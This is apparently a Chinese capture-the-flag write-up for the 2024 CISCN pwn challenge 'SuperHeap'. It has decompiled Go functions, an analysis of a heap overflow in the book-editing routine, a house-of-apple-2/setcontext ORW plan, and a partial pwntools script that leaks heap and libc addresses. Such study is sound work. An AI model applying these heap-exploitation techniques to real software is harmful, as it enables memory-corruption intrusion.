2024 cicsn SuperHeap

文章目录

  • 参考
  • 沙箱
  • 存在protobuf
  • 逆向
    • buy_book
    • see_book
    • return_book
    • edit_book
    • search_book
  • 思路
  • exp

参考

https://hakuya.work/post/7
https://akaieurus.github.io/2024/05/20/2024%E5%9B%BD%E8%B5%9B%E5%88%9D%E8%B5%9Bpwn-wp/#SuperHeap
https://blog.csdn.net/m0_63437215/article/details/127914567

沙箱

在这里插入图片描述

存在protobuf

工具提取

逆向

真难逆,通过字符串定位到相关函数,这里用来个map来int映射到函数,太难逆了,直接字符串定位算了

buy_book

// main.WEB5SF
// local variable allocation has failed, the output may be wrong!
__int64 __golang buy_book_(__int64 a1,__int64 a2,__int64 a3,__int64 a4,__int64 a5,__int64 a6,int a7,int a8,int a9)
{// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]while ( (unsigned __int64)&publishdata_ptr <= *(_QWORD *)(v9 + 16) )a1 = runtime_morestack_noctxt(a1);idx_string[0] = &RTYPE_string;idx_string[1] = &index_string;v10 = qword_41A3E8;v11 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)idx_string,1,1,(unsigned int)&index_string,a7,a8,a9,v79);idx = input_number(v11, v10, v12, 1, 1);if ( idx >= 0x1C || (v14 = book_chunk_array[idx]) != 0 ){Invalid[0] = &RTYPE_string;Invalid[1] = &off_2BBBD0;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)Invalid, 1, 1, v14, v15, v16, v17, v80);}else{index = idx;Special_Data[0] = &RTYPE_string;Special_Data[1] = &off_2BBBE0;v19 = qword_41A3E8;v20 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)Special_Data,1,1,(unsigned int)&off_2BBBE0,v15,v16,v17,v80);specail_data = (char *)read_choice(v20);specail_data_string.len = v19;specail_data_string.ptr = specail_data;v116 = encoding_base32__ptr_Encoding_DecodeString(qword_41A120, specail_data_string);// base32解码输入的if ( v116.1.tab ){Error_decoding[0] = &RTYPE_string;Error_decoding[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)Error_decoding,1,1,v22,v23,v24,v25,v81);}else{ptr = (int)v116.0.ptr;cap = v116.0.cap;input_mypackage_CTFBook = (mypackage_CTFBook *)runtime_newobject(&RTYPE_mypackage_CTFBook,v116.0.len,v116.0.cap,0,(int)v116.1.data,v22,v23,v24,v25);if ( github_com_golang_protobuf_proto_Unmarshal(// 使用protobuf解码ptr,v116.0.len,cap,(unsigned int)off_2BD1C8,(_DWORD)input_mypackage_CTFBook,v26,v27,v28,v29,v81) ){v105[0] = &RTYPE_string;v105[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v105, 1, 1, v30, v31, v32, v33, v82);}else{v117 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, input_mypackage_CTFBook->Title);// 对title字段base64解码if ( v117.1.tab ){errordeocd[0] = &RTYPE_string;errordeocd[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)errordeocd,1,1,v34,v35,v36,v37,v82);}else{title_len = v117.0.len;title_ptr = v117.0.ptr;v118 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, input_mypackage_CTFBook->Author);// 对author字段base64解码if ( v118.1.tab ){v114[0] = &RTYPE_string;v114[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v114, 1, 1, v38, v39, v40, v41, v82);}else{author_ptr = v118.0.ptr;author_len = v118.0.len;v119 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, input_mypackage_CTFBook->Isbn);// 对isbn字段base64解码if ( v119.1.tab ){v113[0] = &RTYPE_string;v113[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)v113,1,1,v42,v43,v44,v45,v82);}else{isbn_ptr = v119.0.ptr;isbn_len = v119.0.len;v120 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, input_mypackage_CTFBook->PublishDate);// 对publishdata解码base64if ( v120.1.tab ){v112[0] = &RTYPE_string;v112[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)v112,1,1,v46,v47,v48,v49,v82);}else{publishdata_ptr = v120.0.ptr;main__cgo_cmalloc((__int64)v120.0.ptr,v120.0.len,v120.0.cap,0,(int)v120.1.data,v46,v47,v48,v49,48,v85);if ( malloc_for_book_struct_addr )// 由上面的main_cgo_cmalloc分配的{book_struct = (_QWORD *)malloc_for_book_struct_addr;main__cgo_cmalloc(title_len,v120.0.len,title_len + 1,0,(int)v120.1.data,v50,v51,v52,v53,title_len + 1,malloc_for_book_struct_addr);v58 = 0x40000000LL;if ( title_len < 0x40000000 )v58 = title_len;v96 = v58;if ( dword_44AC30 ){LODWORD(v120.1.tab) = (_DWORD)book_struct;runtime_gcWriteBarrier(malloc_title_ptr);}else{*book_struct = malloc_title_ptr;}main__cgo_cmalloc(author_len,v120.0.len,author_len + 1,(int)v120.1.tab,(int)v120.1.data,v54,v55,v56,v57,author_len + 1,malloc_title_ptr);if ( dword_44AC30 ){LODWORD(v120.1.tab) = (_DWORD)book_struct + 8;runtime_gcWriteBarrier(malloc_author_ptr_1);}else{book_struct[1] = malloc_author_ptr_1;}main__cgo_cmalloc(isbn_len,v120.0.len,isbn_len + 1,(int)v120.1.tab,(int)v120.1.data,v59,v60,v61,v62,isbn_len + 1,malloc_author_ptr_1);if ( dword_44AC30 ){LODWORD(v120.1.tab) = (_DWORD)book_struct + 16;runtime_gcWriteBarrier(malloc_isbn_ptr);}else{book_struct[2] = malloc_isbn_ptr;}main__cgo_cmalloc(v120.0.len,v120.0.len,LODWORD(v120.0.len) + 1,(int)v120.1.tab,(int)v120.1.data,v63,v64,v65,v66,LOBYTE(v120.0.len) + 1,malloc_isbn_ptr);if ( dword_44AC30 ){runtime_gcWriteBarrier(malloc_publishdata_ptr);}else{book_struct_addr = book_struct;book_struct[3] = malloc_publishdata_ptr;}if ( title_ptr != (uint8 *)*book_struct_addr ){runtime_memmove(*book_struct_addr, title_ptr, v96);book_struct_addr = book_struct;}malloc_author_ptr = (uint8 *)book_struct_addr[1];author_len_1 = 0x40000000LL;if ( author_len < 0x40000000 )author_len_1 = author_len;if ( author_ptr != malloc_author_ptr ){runtime_memmove(malloc_author_ptr, author_ptr, author_len_1);book_struct_addr = book_struct;}malloc_isbn_ptr_1 = (uint8 *)book_struct_addr[2];isbn_len_1 = 0x40000000LL;if ( isbn_len < 0x40000000 )isbn_len_1 = isbn_len;if ( isbn_ptr != malloc_isbn_ptr_1 ){runtime_memmove(malloc_isbn_ptr_1, isbn_ptr, isbn_len_1);book_struct_addr = book_struct;}malloc_publish_ptr = (uint8 *)book_struct_addr[3];malloc_publishdata_len = 0x40000000LL;if ( (__int64)v120.0.len < 0x40000000 )malloc_publishdata_len = v120.0.len;if ( publishdata_ptr != malloc_publish_ptr ){runtime_memmove(malloc_publish_ptr, publishdata_ptr, malloc_publishdata_len);book_struct_addr = book_struct;}input_mypackage_CTFBook_1 = input_mypackage_CTFBook;book_struct_addr[4] = *(_QWORD *)&input_mypackage_CTFBook->Price;book_struct_addr[5] = input_mypackage_CTFBook_1->Stock;if ( dword_44AC30 ){runtime_gcWriteBarrierDX(&book_chunk_array[index], v120.1.data, book_struct_addr);}else{v77 = index;v78 = book_chunk_array;book_chunk_array[index] = book_struct_addr;// 最后赋值到数组中}add_success[0] = &RTYPE_string;add_success[1] = &Book_added_successfully;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)add_success,1,1,v77,(_DWORD)v78,v67,v68,v84);}else{Failed_allocate_memory_Book[0] = &RTYPE_string;Failed_allocate_memory_Book[1] = &off_2BBC00;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)Failed_allocate_memory_Book,1,1,v50,v51,v52,v53,v83);}}}}}}}}
}

see_book

下次可以通过格式化字符串判断结构体的各个变量的类型

// main.CU5GMG
__int64 __golang see_book(__int64 a1,__int64 a2,__int64 a3,__int64 a4,__int64 a5,__int64 a6,int a7,int a8,int a9)
{// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]while ( (unsigned __int64)Invalid_index <= *(_QWORD *)(v9 + 16) )a1 = runtime_morestack_noctxt(a1);v86[0] = &RTYPE_string;v86[1] = &index_string;v10 = qword_41A3E8;v11 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)v86,1,1,(unsigned int)&index_string,a7,a8,a9,v69);index = input_number(v11, v10, v12, 1, 1);if ( index < 0x1C && (v19 = (_QWORD *)book_chunk_array[index]) != 0LL ){book_struct_addr = (_QWORD *)book_chunk_array[index];v83 = runtime_gostring(*v19, v10, v14, 1, 1, v15, v16, v17, v18, v69);v79 = v10;v82 = runtime_gostring(book_struct_addr[1], v10, (_DWORD)book_struct_addr, 1, 1, v21, v22, v23, v24, v69);v78 = v10;v81 = runtime_gostring(book_struct_addr[2], v10, (_DWORD)book_struct_addr, 1, 1, v25, v26, v27, v28, v69);v77 = v10;v80 = runtime_gostring(book_struct_addr[3], v10, (_DWORD)book_struct_addr, 1, 1, v29, v30, v31, v32, v69);v76 = v10;v33 = &v69 + 16;v68 = &v88;((void (__fastcall *)(__int64 *))loc_C278B)(v33);v39 = runtime_convTstring(v83, v79, v34, (_DWORD)v33, 1, v35, v36, v37, v38, v69, v70);v87[0] = (__int64)&RTYPE_string;v87[1] = v39;v44 = runtime_convTstring(v82, v78, (unsigned int)&RTYPE_string, (_DWORD)v33, 1, v40, v41, v42, v43, v69, v70);v87[2] = (__int64)&RTYPE_string;v87[3] = v44;v49 = runtime_convTstring(v81, v77, (unsigned int)&RTYPE_string, (_DWORD)v33, 1, v45, v46, v47, v48, v69, v70);v87[4] = (__int64)&RTYPE_string;v87[5] = v49;v50 = v76;v55 = runtime_convTstring(v80, v76, (unsigned int)&RTYPE_string, (_DWORD)v33, 1, v51, v52, v53, v54, v69, v70);v87[6] = (__int64)&RTYPE_string;v87[7] = v55;v60 = runtime_convT64(book_struct_addr[4], v50, (_DWORD)book_struct_addr, (_DWORD)v33, 1, v56, v57, v58, v59, v69);v87[8] = (__int64)&RTYPE_float64;v87[9] = v60;v65 = runtime_convT64(book_struct_addr[5], v50, (_DWORD)book_struct_addr, (_DWORD)v33, 1, v61, v62, v63, v64, v69);v87[10] = (__int64)&RTYPE_int;v87[11] = v65;                              // 前四个转换为字符串,后两个转换为整数return fmt_Fprintf((unsigned int)io_write,qword_41A3E8,(unsigned int)"Title: %s\nAuthor: %s\nISBN: %s\nPublish Date: %s\nPrice: %.2f\nStock: %d",69,(unsigned int)v87,6,6,v66,v67,v69,v70,v71,v72,v73,v74,v75);}else{Invalid_index[0] = &RTYPE_string;Invalid_index[1] = &Invalid__index;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)Invalid_index,1,1,v15,v16,v17,v18,v69);}
}

return_book

// main.F3ZJ75
__int64 __golang return_book(__int64 a1,__int64 a2,__int64 a3,__int64 a4,__int64 a5,__int64 a6,int a7,int a8,int a9)
{// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]while ( (unsigned __int64)&retaddr <= *(_QWORD *)(v9 + 16) )a1 = runtime_morestack_noctxt(a1);v48[0] = &RTYPE_string;v48[1] = &index_string;v10 = qword_41A3E8;v11 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)v48,1,1,(unsigned int)&index_string,a7,a8,a9,v39);index = input_number(v11, v10, v12, 1, 1);if ( index < 0x1C && (book_struct_addr_1 = (__int64 *)book_chunk_array[index]) != 0LL ){index_1 = index;book_struct_addr = book_chunk_array[index];main_F3ZJ75_func1(book_struct_addr_1, v10, v14, 1LL, 1, (int)book_struct_addr_1, v16, v17, v18);main_F3ZJ75_func2(book_struct_addr, v10, v20, 1, 1, v21, v22, v23, v24, v40);main_F3ZJ75_func3(book_struct_addr, v10, v25, 1, 1, v26, v27, v28, v29, v41);main_F3ZJ75_func4(book_struct_addr, v10, v30, 1, 1, v31, v32, v33, v34, v42);// 是对四个堆指针做检查然后free掉if ( dword_44AC30 ){runtime_gcWriteBarrierDX(&book_chunk_array[index_1], 1LL, 0LL);}else{v38 = book_chunk_array;book_chunk_array[index_1] = 0LL;          // 清零}Book_returne_suceess[0] = &RTYPE_string;Book_returne_suceess[1] = &::Book_returne_suceess;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)Book_returne_suceess,1,1,(_DWORD)v38,v35,v36,v37,v43);}else{v47[0] = &RTYPE_string;v47[1] = &Invalid__index;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)v47,1,1,(_DWORD)book_struct_addr_1,v16,v17,v18,v40);}
}

edit_book

// main.OMJP7W
// local variable allocation has failed, the output may be wrong!
__int64 __golang main_OMJP7W(__int64 a1,__int64 a2,__int64 a3,__int64 a4,__int64 a5,__int64 a6,int a7,int a8,int a9)
{// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]while ( (unsigned __int64)&author_ptr <= *(_QWORD *)(v9 + 16) )a1 = runtime_morestack_noctxt(a1);v82[0] = &RTYPE_string;v82[1] = &index_string;v10 = qword_41A3E8;v11 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)v82,1,1,(unsigned int)&index_string,a7,a8,a9,v58);index = input_number(v11, v10, v12, 1, 1);if ( index < 0x1C && (v14 = book_chunk_array[index]) != 0 ){index_1 = index;Special_Data[0] = &RTYPE_string;Special_Data[1] = &Special__Data;v19 = qword_41A3E8;v20 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)Special_Data,1,1,(unsigned int)&Special__Data,v15,v16,v17,v59);specail_data = (char *)input(v20);v84.len = v19;v84.ptr = specail_data;v85 = encoding_base32__ptr_Encoding_DecodeString(qword_41A120, v84);// base32解码if ( v85.1.tab ){v79[0] = &RTYPE_string;v79[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v79, 1, 1, v22, v23, v24, v25, v60);}else{ptr = (int)v85.0.ptr;cap = v85.0.cap;p_mypackage_CTFBook = (mypackage_CTFBook *)runtime_newobject(&RTYPE_mypackage_CTFBook,v85.0.len,v85.0.cap,0,(int)v85.1.data,v22,v23,v24,v25);if ( github_com_golang_protobuf_proto_Unmarshal(// protobuf反序列化ptr,v85.0.len,cap,(unsigned int)off_2BD1C8,(_DWORD)p_mypackage_CTFBook,v26,v27,v28,v29,v60) ){v78[0] = &RTYPE_string;v78[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v78, 1, 1, v30, v31, v32, v33, v61);}else{v86 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, p_mypackage_CTFBook->Title);if ( v86.1.tab ){v77[0] = &RTYPE_string;v77[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v77, 1, 1, v34, v35, v36, v37, v61);}else{title_len = v86.0.len;title_ptr = v86.0.ptr;v87 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, p_mypackage_CTFBook->Author);if ( v87.1.tab ){v76[0] = &RTYPE_string;v76[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v76, 1, 1, v38, v39, v40, v41, v61);}else{author_len = v87.0.len;author_ptr = v87.0.ptr;v88 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, p_mypackage_CTFBook->Isbn);if ( v88.1.tab ){v75[0] = &RTYPE_string;v75[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)v75,1,1,v42,v43,v44,v45,v61);}else{isbn_len = v88.0.len;isbn_ptr = v88.0.ptr;v89 = encoding_base64__ptr_Encoding_DecodeString(qword_41A138, p_mypackage_CTFBook->PublishDate);if ( v89.1.tab ){v74[0] = &RTYPE_string;v74[1] = &Error__decoding;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)v74,1,1,v46,v47,v48,v49,v61);}else{publishdata_ptr = v89.0.ptr;book_struct_addr = (_QWORD *)book_chunk_array[index_1];book_struct_addr_1 = book_struct_addr;title_len_1 = 0x40000000LL;if ( title_len < 0x40000000 )title_len_1 = title_len;if ( title_ptr != (uint8 *)*book_struct_addr ){runtime_memmove(*book_struct_addr, title_ptr, title_len_1);// 根据输入的调整len,没有限制,以下都一样v89.0.ptr = publishdata_ptr;book_struct_addr = book_struct_addr_1;}author_len_1 = 0x40000000LL;if ( author_len < 0x40000000 )author_len_1 = author_len;if ( author_ptr != (uint8 *)book_struct_addr[1] ){runtime_memmove(book_struct_addr[1], author_ptr, author_len_1);v89.0.ptr = publishdata_ptr;book_struct_addr = book_struct_addr_1;}isbn_len_1 = 0x40000000LL;if ( isbn_len < 0x40000000 )isbn_len_1 = isbn_len;v54 = (int)isbn_ptr;if ( isbn_ptr != (uint8 *)book_struct_addr[2] ){runtime_memmove(book_struct_addr[2], isbn_ptr, isbn_len_1);v89.0.ptr = publishdata_ptr;book_struct_addr = book_struct_addr_1;}publishdata_len = 0x40000000LL;if ( (__int64)v89.0.len < 0x40000000 )publishdata_len = v89.0.len;if ( v89.0.ptr != (uint8 *)book_struct_addr[3] ){runtime_memmove(book_struct_addr[3], v89.0.ptr, publishdata_len);book_struct_addr = book_struct_addr_1;}v56 = p_mypackage_CTFBook;book_struct_addr[4] = *(_QWORD *)&p_mypackage_CTFBook->Price;Stock = v56->Stock;book_struct_addr[5] = Stock;    // 最后两项没法溢出v83[0] = &RTYPE_string;v83[1] = &off_2BBC40;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)v83,1,1,Stock,v54,v48,v49,v61);}}}}}}}else{v81[0] = &RTYPE_string;v81[1] = &Invalid__index;return fmt_Fprintln((unsigned int)io_write, qword_41A3E8, (unsigned int)v81, 1, 1, v14, v15, v16, v17, v59);}
}

search_book

// main.NSKGUW
__int64 __golang search_book(__int64 a1,__int64 a2,__int64 a3,__int64 a4,__int64 a5,__int64 a6,int a7,int a8,int a9)
{// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]while ( (unsigned __int64)&v156 <= *(_QWORD *)(v9 + 16) )a1 = runtime_morestack_noctxt(a1);Keyword__[0] = &RTYPE_string;Keyword__[1] = &Keyword_;v10 = qword_41A3E8;v11 = fmt_Fprint((unsigned int)io_write,qword_41A3E8,(unsigned int)Keyword__,1,1,(unsigned int)&Keyword_,a7,a8,a9,*(__int64 *)v124);keyword = input(v11);len = v10;                                    // v10可能存储input后输入的长度v12 = book_chunk_array_copy;com_success = book_chunk_array;result = ((__int64 (__fastcall *)(__int64 *, _QWORD *))copy_array)(book_chunk_array_copy, book_chunk_array);// 这个是把将一个数组的数据赋值到另一个数组的数据的index = 0LL;is_have = 0;while ( index < 28 ){index_1 = index;v149 = is_have;book_chunk_addr = (_QWORD *)book_chunk_array_copy[index];book_chunk_addr_1 = book_chunk_addr;if ( book_chunk_addr ){v21 = runtime_gostring(*book_chunk_addr,v10,index,(_DWORD)v12,(_DWORD)com_success,(_DWORD)book_chunk_addr,v16,v17,v18,*(__int64 *)v124);if ( len == v10 )                         // v10存储提取到的字符串长度{len_1 = v10;v10 = keyword;first_com_flag = runtime_memequal(v21, keyword, len_1);// 比较的}else{first_com_flag = 0;}if ( first_com_flag )                     // 比较成功,没必要比较第二个{second_flag = 1;}else{v26 = runtime_gostring(book_chunk_addr_1[1],v10,(_DWORD)book_chunk_addr_1,(_DWORD)v12,(_DWORD)com_success,v22,v16,v17,v18,*(__int64 *)v124);if ( len == v10 ){v27 = v10;v10 = keyword;second_flag = runtime_memequal(v26, keyword, v27);}else{second_flag = 0;}}if ( second_flag )                        // 比较成功,没必要比较第三个{third_flag = 1;}else{v29 = runtime_gostring(book_chunk_addr_1[2],v10,(_DWORD)book_chunk_addr_1,(_DWORD)v12,(_DWORD)com_success,v22,v16,v17,v18,*(__int64 *)v124);if ( v10 == len )third_flag = runtime_memequal(v29, keyword, v10);elsethird_flag = 0;}index = index_1;is_have = v149;v10 = len;book_chunk_addr = book_chunk_addr_1;LODWORD(com_success) = third_flag;result = keyword;}else{LODWORD(com_success) = 0;}if ( (_BYTE)com_success )                   // 比较成功,输出{v30 = runtime_gostring(*book_chunk_addr,v10,index,(_DWORD)v12,(_DWORD)com_success,(_DWORD)book_chunk_addr,v16,v17,v18,*(__int64 *)v124);v31 = v10;v32 = v30;v35 = runtime_stringtoslicebyte((unsigned int)&v159, v30, v31, (_DWORD)v12, (_DWORD)com_success, v33, v34);v162 = main_IDJS3Z(v35, v32, v36, (int)v12, (int)com_success, v37, v38, v39, v40, *(_slice_uint8 *)v124);v152 = v32;v45 = runtime_gostring(book_chunk_addr_1[1],v32,(_DWORD)book_chunk_addr_1,(_DWORD)v12,(_DWORD)com_success,v41,v42,v43,v44,v125);v46 = v32;v47 = v45;v50 = runtime_stringtoslicebyte((unsigned int)&v158, v45, v46, (_DWORD)v12, (_DWORD)com_success, v48, v49);v165 = main_IDJS3Z(v50, v47, v51, (int)v12, (int)com_success, v52, v53, v54, v55, v126);v154 = v47;v60 = runtime_gostring(book_chunk_addr_1[2],v47,(_DWORD)book_chunk_addr_1,(_DWORD)v12,(_DWORD)com_success,v56,v57,v58,v59,v127);v61 = v47;v62 = v60;v65 = runtime_stringtoslicebyte((unsigned int)&v157, v60, v61, (_DWORD)v12, (_DWORD)com_success, v63, v64);v164 = main_IDJS3Z(v65, v62, v66, (int)v12, (int)com_success, v67, v68, v69, v70, v128);v153 = v62;v75 = runtime_gostring(book_chunk_addr_1[3],v62,(_DWORD)book_chunk_addr_1,(_DWORD)v12,(_DWORD)com_success,v71,v72,v73,v74,v129);v76 = v62;v77 = v75;v80 = runtime_stringtoslicebyte((unsigned int)&v155, v75, v76, (_DWORD)v12, (_DWORD)com_success, v78, v79);v163 = main_IDJS3Z(v80, v77, v81, (int)v12, (int)com_success, v82, v83, v84, v85, v130);((void (__fastcall *)(_QWORD *))loc_C2786)(Keyword__);v91 = runtime_convT64(index_1, v77, v86, (unsigned int)Keyword__, (_DWORD)com_success, v87, v88, v89, v90, v131);v168[0] = (__int64)&RTYPE_int;v168[1] = v91;v96 = runtime_convTstring(v162,v152,(unsigned int)&RTYPE_int,(unsigned int)Keyword__,(_DWORD)com_success,v92,v93,v94,v95,v132,v139);v168[2] = (__int64)&RTYPE_string;v168[3] = v96;v101 = runtime_convTstring(v165,v154,(unsigned int)&RTYPE_string,(unsigned int)Keyword__,(_DWORD)com_success,v97,v98,v99,v100,v133,v140);v168[4] = (__int64)&RTYPE_string;v168[5] = v101;v106 = runtime_convTstring(v164,v153,(unsigned int)&RTYPE_string,(unsigned int)Keyword__,(_DWORD)com_success,v102,v103,v104,v105,v134,v141);v168[6] = (__int64)&RTYPE_string;v168[7] = v106;v111 = runtime_convTstring(v163,v77,(unsigned int)&RTYPE_string,(unsigned int)Keyword__,(_DWORD)com_success,v107,v108,v109,v110,v135,v142);v168[8] = (__int64)&RTYPE_string;v168[9] = v111;v116 = runtime_convT64(book_chunk_addr_1[4],v77,(unsigned int)&RTYPE_string,(unsigned int)Keyword__,(_DWORD)com_success,v112,v113,v114,v115,v136);v168[10] = (__int64)&RTYPE_float64;v168[11] = v116;v121 = runtime_convT64(book_chunk_addr_1[5],v77,(unsigned int)&RTYPE_float64,(unsigned int)Keyword__,(_DWORD)com_success,v117,v118,v119,v120,v137);v168[12] = (__int64)&RTYPE_int;v168[13] = v121;LODWORD(v12) = 79;fmt_Fprintf((unsigned int)io_write,qword_41A3E8,(unsigned int)"Index: %d\nTitle: %s\nAuthor: %s\nISBN: %s\nPublish Date: %s\nPrice: %.2f\nSt",79,(unsigned int)v168,7,7,v122,v123,v138,v143,v144,v145,v146,v147,v148);result = keyword;index = index_1;is_have = v149;v10 = len;LODWORD(com_success) = (unsigned __int8)com_success;}++index;is_have |= (unsigned __int8)com_success;}if ( !is_have )                               // 没有匹配的{No_matching_books_[0] = &RTYPE_string;No_matching_books_[1] = &No_matching_books;return fmt_Fprintln((unsigned int)io_write,qword_41A3E8,(unsigned int)No_matching_books_,1,1,(_DWORD)book_chunk_addr,v16,v17,v18,*(__int64 *)v124);}return result;
}

思路

edit存在任意长度溢出,每次add会分配多个chunk(应该是6个 4个是内部数据 1个当做接受输入的special数据 一个当做book结构体地址 但调试时候断点malloc只有5个,不知道为什么,可能是那个函数不同,可能并不是分配的)
delete会将四个堆指针free掉,然后book_chunk_array对应位置清零,但不会free掉book_chunk

但感觉有edit任意长度溢出就行了,但add edit delete show都会对索引对应的chunk_array检查是否不为零
add会对输入的数据首先进行base32解码,然后protobuf反序列化,然后对前四个字段进行base64解码

  1. 可以直接从free掉的chunk得到从而利用残留的,bookstruct在的结构体size为0x40,然后剩余四个chunk是0x20
    刚开始就存在巨多chunk, 泄露堆地址,申请两次,第7个0x20的chunk的fd部分仅仅是next部分所在的地址右移12位置,然后可以通过tcachebin泄露heap地址
    在这里插入图片描述
    申请第八个0x20的chunk会导致其到fastbin寻找,然后找到后会将fastbin的chunk放到tcache中

  2. 然后泄露libc基地址,虽然有很多无用的已经free掉的chunk干扰,但我们可以使得要构造的堆布局的大小不符合已经free的chunk就行,至于一些不会用到的堆布局的堆,我们让他依然来自bin就行了
    在这里插入图片描述
    在这里插入图片描述
    我们要使得分配到一个非tcache大小的chunk,然后不是来自bin中的,然后free后能够进入unsortedbin,再通过溢出填充然后能够泄露,接下来分配book_struct不会来自bin中,由于是通过内容溢出,所以内容的chunk也要不来自bin,连着两个就可以实现第一个的内容溢出到第二个的内容

  3. 实现任意地址写,覆盖写一个book_struct结构的某个字段地址为sderr,然后可以写stderr的内容 ,依然是需要一个book_struct结构chunk和一个内容chunk和下一个book_struct

在这里插入图片描述
由于0x40会从free中的chunk分裂,所以得把他们全部消掉才行(保证没有大于0x40的就行),从smallbin消掉,然后此时再分配的会从之前free的0x500chunk分裂开,这样也可以溢出到修改book_struct写入stderr从而修改stderr

  1. house of apple 2 +setcontext+orw读取flag,由于最后执行篡改后的vtable中的函数时rdi是stderr,而rdx是wide_data,构造wide_data+0xa0为wide_data上rop链部分的位置,wide_data+0xa8为ret

这里还需要write_ptr不为零好像
在这里插入图片描述

.text:00000000000580DD                 mov     rsp, [rdx+0A0h]
.text:00000000000580E4                 mov     rbx, [rdx+80h]
.text:00000000000580EB                 mov     rbp, [rdx+78h]
.text:00000000000580EF                 mov     r12, [rdx+48h]
.text:00000000000580F3                 mov     r13, [rdx+50h]
.text:00000000000580F7                 mov     r14, [rdx+58h]
.text:00000000000580FB                 mov     r15, [rdx+60h]
.text:00000000000580FF                 test    dword ptr fs:48h, 2....
.text:00000000000581C6                 mov     rcx, [rdx+0A8h]
.text:00000000000581CD                 push    rcx
.text:00000000000581CE                 mov     rsi, [rdx+70h]
.text:00000000000581D2                 mov     rdi, [rdx+68h]
.text:00000000000581D6                 mov     rcx, [rdx+98h]
.text:00000000000581DD                 mov     r8, [rdx+28h]
.text:00000000000581E1                 mov     r9, [rdx+30h]
.text:00000000000581E5                 mov     rdx, [rdx+88h]
.text:00000000000581EC                 xor     eax, eax
.text:00000000000581EE                 retn

在这里插入图片描述

exp

from pwn import *
import base64
import bookProto_pb2
context(arch="amd64",os="linux")
p=process("./pwn")
libc=ELF("./libc.so.6")
def prepare(title,author,isbn,publish_date,price,stock):book=bookProto_pb2.CTFBook()book.title=base64.b64encode(title)book.author=base64.b64encode(author)book.isbn=base64.b64encode(isbn)book.publish_date=base64.b64encode(publish_date)book.price=pricebook.stock=stockpack=book.SerializeToString()return packdef buy(idx,title,author,isbn,publish_date,price,stock):p.sendlineafter(b"Enter your choice > ",b"1")p.sendlineafter(b"Index: ",str(idx))p.sendlineafter(b"Special Data: ", base64.b32encode(prepare(title,author,isbn,publish_date,price,stock)))def see(idx):p.sendlineafter(b"Enter your choice > ",b"2")p.sendlineafter(b"Index: ",str(idx))def dele(idx):p.sendlineafter(b"Enter your choice > ",b"3")p.sendlineafter(b"Index: ",str(idx))def edit(idx,title,author,isbn,publish_date,price,stock):p.sendlineafter(b"Enter your choice > ",b"4")p.sendlineafter(b"Index: ",str(idx))p.sendlineafter(b"Special Data: ", base64.b32encode(prepare(title,author,isbn,publish_date,price,stock)))buy(0,b"00000001",b"00000002",b"00000003",b"00000004",1.1,1)
buy(1,b'11111111',b'11111112',b'',b'11111114',1,1)
# 第1个book_struct 的第三个字段是fastbin中0x20大小最后一个chunk,此时泄漏fd,可以得到heap地址
see(1)
p.recvuntil(b'ISBN: ')
heap=u64(p.recv(5).ljust(8,b"\x00"))
heap=heap<<12
print("heap",hex(heap))buy(2,b"2"*0x20,b"",b"",b"",1,1)
buy(3,b"3"*0x4f0,b"",b"",b"",1,1)
# largechunk会触发合并fastbin合并到unsortedbin,然后再到unsortedbin寻找的过程中分配到smallbinbuy(4,b"4"*0x200,b"",b"",b"",1,1)#防止free3和topchunk合并,由于此时0x20和0x40的堆在bin中已经有了,我们需要找个不来自bin的才行,并且也不能是被分割的
dele(3) 
edit(2,b"2"*0x70,b"",b"",b"",1,1)
see(2)
p.recvuntil(b'2'*0x70)
libc.address=u64(p.recv(6).ljust(8,b"\x00"))-0x21ace0
print("libc",hex(libc.address))   
